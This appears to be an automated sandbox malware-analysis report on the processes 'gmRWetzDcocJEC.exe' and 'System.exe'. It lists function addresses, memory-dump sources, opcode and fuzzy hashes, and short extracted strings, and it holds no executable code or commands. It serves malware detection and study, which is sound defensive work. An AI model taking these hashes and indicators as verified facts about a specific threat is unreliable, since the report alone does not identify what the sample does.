Instruction Fuzzy Hash: E441E00BF0C5A745E31973FD71399EC6B609FC127EB1A87B3E15E890D74D08248682E5

Analysis Process: gmRWetzDcocJEC.exePID: 8084, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B800D48 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

5X_H, xrefs: 00007FFD9B800DF3

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: 009e992f296480d4b67cd8c64cd41770db814388a3412f46424eb77d3836028a
Instruction ID: f3c1f801703f62abd87ba972f38f5474521bb7406596871d88add6479fe5247a
Opcode Fuzzy Hash: 009e992f296480d4b67cd8c64cd41770db814388a3412f46424eb77d3836028a
Instruction Fuzzy Hash: 8891D175A29A8E4FE759DF688865BE97FE0FF9A300F4101BAD098D72E6DA7814018740

Function 00007FFD9B800E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a0a4574a00b074a92eb17242fbe6b85178fb4f40b9c2cb773030377b2862b1
Instruction ID: 902cb39a19acbbd89af8420348714c3cd33a488f6806afddcf30b15e7a5ec91c
Opcode Fuzzy Hash: b1a0a4574a00b074a92eb17242fbe6b85178fb4f40b9c2cb773030377b2862b1
Instruction Fuzzy Hash: 5C51E372A2898E4EE758CF5C8865BF9BFE0EB9A354F4001BED059D33E9DBB414118740

Function 00007FFD9B810CF0 Relevance: .9, Instructions: 948COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae2416bfb3eb8ef0aa49b7f93bdaf3a5b8638d7e50eba1bc6038ab13596f260
Instruction ID: aff353a7932dfebccb794799f0185592e802d9ee220ae1eff78a0d51374edaf2
Opcode Fuzzy Hash: 6ae2416bfb3eb8ef0aa49b7f93bdaf3a5b8638d7e50eba1bc6038ab13596f260
Instruction Fuzzy Hash: E562D721F1E95E4FEBA8EB6888A66B97392FF9C340F0505B9D05DC32E6DD24BD418740

Function 00007FFD9B811305 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9e8e65b988b03d0180ace578c182068d0b7ae4ca00c68db85051a368a3d50cf
Instruction ID: 8916ec261e95b1fde2b4265c37199b6cafd0c510c4d7ed09d1b4e0e79b92e34c
Opcode Fuzzy Hash: d9e8e65b988b03d0180ace578c182068d0b7ae4ca00c68db85051a368a3d50cf
Instruction Fuzzy Hash: 4491A471F1E94E4FE768EB6894A16B873A2FF98340F0505B9D05EC32D7DE38A9428741

Function 00007FFD9B800908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb5ecb4e5159d803715218a3aa6ce7a8f5ecb3ad6198861c50ee8b0b733260f
Instruction ID: 6474b08f0654597d895f0873d10e458d4eaeca4df040d818330b4a8d16c6240c
Opcode Fuzzy Hash: 2fb5ecb4e5159d803715218a3aa6ce7a8f5ecb3ad6198861c50ee8b0b733260f
Instruction Fuzzy Hash: 4521E63170D8194FD768EB5CE88ADB977D1EF9932170201BAE5CAC7176E911EC8287C1

Function 00007FFD9B800998 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5a579bd4741b54e9a9d420c10946b9f7808dddc7f619ada4f86e0296b253a6
Instruction ID: e1683fc69f45cd5de763e941b3e20ac21a141b89da6a6ccaa833f0c6249c649f
Opcode Fuzzy Hash: cd5a579bd4741b54e9a9d420c10946b9f7808dddc7f619ada4f86e0296b253a6
Instruction Fuzzy Hash: 73214920B1991D0FE758BB6C54AAAB5B3C6EF9D311F4100BDE45DC32FBDD28AC418241

Function 00007FFD9B800C25 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8808328ceb0124a99e86b6a528943dfd3395408f7ecf3fa50676a4fde75c42e
Instruction ID: d5f8758503062f3a9fe52eb4c8f7b5e32b34699b33861bde414606b7f94c5ec9
Opcode Fuzzy Hash: d8808328ceb0124a99e86b6a528943dfd3395408f7ecf3fa50676a4fde75c42e
Instruction Fuzzy Hash: EE21F936F1D68D8FE712A7B898250EC3B70EF46365F1681B3D098CA1E3D9382646C791

Function 00007FFD9B8046FE Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dab04128570270d70297b1a6319735edd343b127f71cd9634a50f0b247c9244
Instruction ID: f0416c8804ae8737692a27865c2b52ec2b9e8680fc3a70de41b7dca3b64c150f
Opcode Fuzzy Hash: 1dab04128570270d70297b1a6319735edd343b127f71cd9634a50f0b247c9244
Instruction Fuzzy Hash: 7D218831E5D41D8EEB74E758C8647F862A1FF4D351F5601B9D48EE32B2DE286E414740

Function 00007FFD9B8008F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f462e3848896bd859ddedf790d9e53c54a04be6a7dc5e1a1106104bfea41a6
Instruction ID: 3f741cb592be0e2907111349f278ee22711d812777fb61b5c7d0e67fcebaeffe
Opcode Fuzzy Hash: 08f462e3848896bd859ddedf790d9e53c54a04be6a7dc5e1a1106104bfea41a6
Instruction Fuzzy Hash: 2C012432F0E92C0B9638965DA80A977B3C2DF8EB723161279E88EC3661CC00AC1342C0

Function 00007FFD9B800C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e5201a0ac0f91604f4c33bae34809287f33fd4594cc72fd00a828e4a1488ee
Instruction ID: 1b5c8d5d8141ea8803f117b7dc54e9416d3d3a966f7e8eb19962703c7bad546b
Opcode Fuzzy Hash: b8e5201a0ac0f91604f4c33bae34809287f33fd4594cc72fd00a828e4a1488ee
Instruction Fuzzy Hash: 9211CE32B1E68D8FE712EBB498611EC7BB0EF46751F0644B3C088DB2A2D9382745C791

Function 00007FFD9B8155BD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9d6b434464b9eed21085ec98ac4948e49e91d9728334ce292ea06216d5f7dc
Instruction ID: b35177140b4b22c711425df2e7f48665f529ab9f3dc472d25a77ed89a420a31f
Opcode Fuzzy Hash: cf9d6b434464b9eed21085ec98ac4948e49e91d9728334ce292ea06216d5f7dc
Instruction Fuzzy Hash: 55014E17F1A6560AD718B76CD4790F87790EFC612978941B3C04DCD1D3DC05988A8280

Function 00007FFD9B80480A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90cd31da24f513d21aaa8876a5721ec6c6bdf428686beba1be954c2cbf51b0e0
Instruction ID: 30e877017b9df81808c95c797ab465ece5dee14633a250ba185a6a1ddbe7bf68
Opcode Fuzzy Hash: 90cd31da24f513d21aaa8876a5721ec6c6bdf428686beba1be954c2cbf51b0e0
Instruction Fuzzy Hash: D3016230B5D51D8FEBA8F768D4246F862E1EF59350F0A40B9D48EC32F2DD28AD414640

Function 00007FFD9B800C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c20393ff00c97b6f49d66fc36a3c754195aabd0bc1f13ff9bd90149969c065
Instruction ID: 5d92fb0be750a9480f1191cb2bcb32f7e81c370e2205654437759d6408703429
Opcode Fuzzy Hash: a6c20393ff00c97b6f49d66fc36a3c754195aabd0bc1f13ff9bd90149969c065
Instruction Fuzzy Hash: 8A019E31E1E28D9FD712DBB488600DD7FB0AF46700F1641F7C084DB2A6D9382A44C751

Function 00007FFD9B8144D9 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d908b639e1f296e6979392dbd32c929999ed4e975d3e6c49e2c06a1f65da90f0
Instruction ID: 4e1f1623ebcc1b133d1eeb533449bd7f9d5da9d739cc675c185b55450bb73e81
Opcode Fuzzy Hash: d908b639e1f296e6979392dbd32c929999ed4e975d3e6c49e2c06a1f65da90f0
Instruction Fuzzy Hash: 3F018070E0940B8BEB64DB94C860ABD77E1EF55310F15053AD415972D8DF786A428B80

Function 00007FFD9B800C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c3eafeae5b4e5e63eba10bbf3856f68faabc709498aadce80c26f2b61d39d4
Instruction ID: de9ec1f8d8d0430cd9500a75b0aa3cae4daf81585331e379304998c8160dfc70
Opcode Fuzzy Hash: 81c3eafeae5b4e5e63eba10bbf3856f68faabc709498aadce80c26f2b61d39d4
Instruction Fuzzy Hash: 8B017C30E1E28D9FE712DBB488644DD7FB0AF06704F1641F3C084CB2A6D9382A44C741

Function 00007FFD9B8047D6 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
Instruction ID: afe74950e18795cc6186cb42aeadc1500a8a212b77a8feee29e478e7d4692fd6
Opcode Fuzzy Hash: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
Instruction Fuzzy Hash: 59F09630E4D41D8AEAB4E744D8606F423A1EF59351F1601BDC8CEE31B2CD286E454540

Function 00007FFD9B814C20 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
Instruction ID: a2d047aa9abd5aff2e4d595c2e934d2601c93db29b75e867032d736fdebfbff5
Opcode Fuzzy Hash: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
Instruction Fuzzy Hash: F6F0A730B0F50F4BE7289B4894506B53251FF59311B175179D45EC21D6DE38E9514B84

Function 00007FFD9B8199FA Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac26f9787a8439bfe303440a68a75e1ada8ad573aeae4a4d75d4735de5551504
Instruction ID: 0d8474bd4bec9dd5e42c5ef158d0759250b194cecab73941a62b37e8cd8da803
Opcode Fuzzy Hash: ac26f9787a8439bfe303440a68a75e1ada8ad573aeae4a4d75d4735de5551504
Instruction Fuzzy Hash: 03F03031E0951D8FEB64EB44C891BE973A2EB18311F5242B6D80DD72E5DE38AE418B81

Function 00007FFD9B80393E Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
Instruction ID: 3b445e6db0ec63861a8e4bc13c0799b7ccb00ce0eac333a191da017794d4d07b
Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
Instruction Fuzzy Hash: 35F03030E0900A4BFBA4A7C8C870BEE33A4DF5A350F150179D98E933D1DD28AA418709

Function 00007FFD9B8156F8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52aabb08f52605fce5426560deeb839c5d4ef41e8323edaf2966256d64e727ef
Instruction ID: 421205aa309d513d56cbd64cda69411820bf91e02bf8d1d280e44347f773a103
Opcode Fuzzy Hash: 52aabb08f52605fce5426560deeb839c5d4ef41e8323edaf2966256d64e727ef
Instruction Fuzzy Hash: 2AD05E30B6090D4B8B0CA62D8458534F3D5E7AA6067945279940BC2291ED25ECC6CB80

Function 00007FFD9B815658 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
Instruction ID: d80293b1f81917e51491cc86f7038aeb010c55f620a4e81d006469b61620007b
Opcode Fuzzy Hash: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
Instruction Fuzzy Hash: 75D05E34B6090D4B8B1CA62D8468470B3D1E7AE2067D45278940BC2295EE25ECC68B80

Function 00007FFD9B800B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
Instruction ID: 5ab1403444bdb2de602e1aa801d48707dc2dd2cf0fdd08135c0ebdfc44cccfa6
Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
Instruction Fuzzy Hash: 6DD0A73062954E4FDA00B77CC84A8547BA0EF0F215BD510F1E009C7961C50948558B00

Function 00007FFD9B800CBF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
Instruction ID: 7a44f67265e69f5841f89a9a34fd65181a1fe13aaa524c436320c3c5d600afc5
Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
Instruction Fuzzy Hash: 46E01234B1920ECBE710DB94C4946ED7761EF55751F104265C44187399DA786784C680

Function 00007FFD9B8006A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52aa4f096be39586825a0ec286149d82f03cd19f8efd59d21a8297e69f83d923
Instruction ID: 63bb3a238df59176553b54f6133b8da120fdb3ae656bf45b2e7f235462ee0396
Opcode Fuzzy Hash: 52aa4f096be39586825a0ec286149d82f03cd19f8efd59d21a8297e69f83d923
Instruction Fuzzy Hash: 09C00205F6B65E01E86573AA98660ECA1419FDDAD1FD60172D598400A19C4D22954256

Function 00007FFD9B8012E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
Instruction ID: 8bf2ebaceb7d58273ab388b296271fc617e4881d33b871f009d07c816144a5bf
Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
Instruction Fuzzy Hash: 6AC08C3061180C8FC918EB28C88480433A0FF0D200BC60090E009C7171E229DCC1C740

Function 00007FFD9B8059C7 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12de09c4b934db9315d6c6ab80a8836e2926975b267c11fcc934e5500b3a13dc
Instruction ID: 531345423da0e6e28e8dffb6ae36f27c3272239a98439b3a8febb6ffb46f9626
Opcode Fuzzy Hash: 12de09c4b934db9315d6c6ab80a8836e2926975b267c11fcc934e5500b3a13dc
Instruction Fuzzy Hash: 09C08C00F19C9A02F21A63445830ABD84429F84308F8104B8F01DC73EECC0C5B0202C3

Function 00007FFD9B8006C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
Instruction ID: df46a63ff164d294c19e250372e294d922449489d235673a303513351b01fdf8
Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
Instruction Fuzzy Hash: 37B01200D7B40F00E46433FA08520E470409F4C1C0FC20070D48C400A19C4D12940342

Non-executed Functions

Function 00007FFD9B810622 Relevance: 9.0, Strings: 7, Instructions: 300COMMON

Download Yara Rule

Strings

K_^%, xrefs: 00007FFD9B8106C9
K_^$, xrefs: 00007FFD9B8106C2
K_^9, xrefs: 00007FFD9B81076A
K_^1, xrefs: 00007FFD9B81072A
K_^:, xrefs: 00007FFD9B810772
#<K, xrefs: 00007FFD9B810897
^+=, xrefs: 00007FFD9B81078E

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
API String ID: 0-1709254129
Opcode ID: 7109adf5e5455b1e7812a980ac01664e60d62356f358db5c7f9a2dcea8ace12b
Instruction ID: e1c0bb66d372b14644d75ec4b22317a03bb6dec40282c58299b97290aefe9de3
Opcode Fuzzy Hash: 7109adf5e5455b1e7812a980ac01664e60d62356f358db5c7f9a2dcea8ace12b
Instruction Fuzzy Hash: 1371D92BF0D56608E718B7AD79A98FD6720DFC133E726C7B7D1AE890C78C18648241D5

Function 00007FFD9B8106D3 Relevance: 9.0, Strings: 7, Instructions: 226COMMON

Download Yara Rule

Strings

K_^%, xrefs: 00007FFD9B8106C9
K_^$, xrefs: 00007FFD9B8106C2
K_^9, xrefs: 00007FFD9B81076A
K_^1, xrefs: 00007FFD9B81072A
K_^:, xrefs: 00007FFD9B810772
#<K, xrefs: 00007FFD9B810897
^+=, xrefs: 00007FFD9B81078E

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
API String ID: 0-1709254129
Opcode ID: 826cad02e9df8558e1c57dd88811ffa8deb86860069927c8c8d2ac5b2457a08f
Instruction ID: 144c2f5c155021c672c12d7741d2b9ec4ccaf4158e2c86dcc6610f94135fa083
Opcode Fuzzy Hash: 826cad02e9df8558e1c57dd88811ffa8deb86860069927c8c8d2ac5b2457a08f
Instruction Fuzzy Hash: E651951BF0D5A604E719B7A8796A8FD2724DFC133EB26C7B3E12E880CB4C1C658241D9

Function 00007FFD9B8106FA Relevance: 9.0, Strings: 7, Instructions: 216COMMON

Download Yara Rule

Strings

K_^+, xrefs: 00007FFD9B8106FA
=K_^, xrefs: 00007FFD9B810701
K_^9, xrefs: 00007FFD9B81076A
K_^1, xrefs: 00007FFD9B81072A
K_^:, xrefs: 00007FFD9B810772
#<K, xrefs: 00007FFD9B810897
^+=, xrefs: 00007FFD9B81078E

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b810000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID: =K_^$K_^+$K_^1$K_^9$K_^:$^+=$#<K
API String ID: 0-3531221116
Opcode ID: d5c2da711024687b5f9eb676bd247d51d150476eabc9bb37cfe23bbcae2ac0b8
Instruction ID: 93305281efccf561a96ca4d4d18f0bbe2a05545a1a3b97df6fa1a26eb54e5c11
Opcode Fuzzy Hash: d5c2da711024687b5f9eb676bd247d51d150476eabc9bb37cfe23bbcae2ac0b8
Instruction Fuzzy Hash: E151651BE0C5A604E718B6ED3A5A8FD6724DFC137EB26C7B3E12E880CB4D1C648241D5

Function 00007FFD9B8009B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9B800B3E
"s9, xrefs: 00007FFD9B800B46
!k9, xrefs: 00007FFD9B800B4E
c9, xrefs: 00007FFD9B800B56

Memory Dump Source

Source File: 00000016.00000002.1871413151.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9b800000_gmRWetzDcocJEC.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 6c78c04dceedd6c48a6389d6869095a3798b3de04c65c99d2eb0891db026d1bc
Instruction ID: 97ad6946221a7e37a0a389d01994dc9c89aac67a07b7b23b60cc793713f040ca
Opcode Fuzzy Hash: 6c78c04dceedd6c48a6389d6869095a3798b3de04c65c99d2eb0891db026d1bc
Instruction Fuzzy Hash: E841D50BF194A705E31A73FC75268FC6B649FC137EB6A82B3E05E890DB4D08608582D5

Analysis Process: System.exePID: 8104, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B8112E5 Relevance: 1.7, Strings: 1, Instructions: 489COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B811296

Memory Dump Source

Source File: 00000017.00000002.1871104162.00007FFD9B811000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B811000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b811000_System.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 2f6dc224fb5b6f14e0f5c223c8dff39246215e7534232782dae50feda6a44bca
Instruction ID: 8bfbc89203d6c106c0db950ee113df0a7e5c84f66dce276dd6a8749697474050
Opcode Fuzzy Hash: 2f6dc224fb5b6f14e0f5c223c8dff39246215e7534232782dae50feda6a44bca
Instruction Fuzzy Hash: 66C1CD71A2F65E0BE33D6A6848631B47791EB96305B2A53BDCDDBC349BDC18690382C1

Function 00007FFD9B7E0D48 Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFD9B7E0DF3

Memory Dump Source

Source File: 00000017.00000002.1871104162.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffd9b7e0000_System.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 2673b6bda593073e9b965f8b0c0dbcbd751841e05830832179fcfde2cb164267
Instruction ID: 617a7bbbf13c46b0fe786e9a7b7724e0bf1c8148f0b43ab12b2d25a62f4df31a
Opcode Fuzzy Hash: 2673b6bda593073e9b965f8b0c0dbcbd751841e05830832179fcfde2cb164267
Instruction Fuzzy Hash: 4E510565A1DA8D4FE75ADF688876BA87BE1FF96700F0501BAD058C72F7DE6828018340

